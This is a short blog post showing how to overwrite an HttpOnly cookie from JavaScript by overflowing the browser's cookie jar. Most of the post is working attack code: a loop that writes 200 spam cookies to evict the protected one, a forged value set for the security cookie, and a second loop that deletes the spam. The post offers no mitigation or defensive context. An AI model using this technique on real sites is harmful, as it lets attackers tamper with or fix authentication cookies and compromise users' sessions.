/java-script/

Overflowing the Cookie Jar. Overwrite HttpOnly cookie by javascript.

2017-03-07 20:24:30

Beckend

If backend create cookie like this:

Cookie cookie = new Cookie("security-cookie", "0123456789");
cookie.setHttpOnly(true);
response.addCookie(cookie);

the front user shouldn't have possibility to overwrite this by javascript, for example

document.cookie="security-cookie=000000001"

but you can do something like this :)

for (var i = 200; i > 0; i--) {
    var cookieName = "cookie_spam_" + i;
    var cookieValue = "cookie_spam_" + i;
    document.cookie = cookieName + "=" + cookieValue;
}

document.cookie = "security-cookie=99999999999";

for (var i = 200; i > 0; i--) {
    var cookieName = "cookie_spam_" + i;
    var cookieValue = "cookie_spam_" + i;
    document.cookie = cookieName + "=" + cookieValue + ";expires=Thu, 01 Jan 1970 00:00:01 GMT;";
}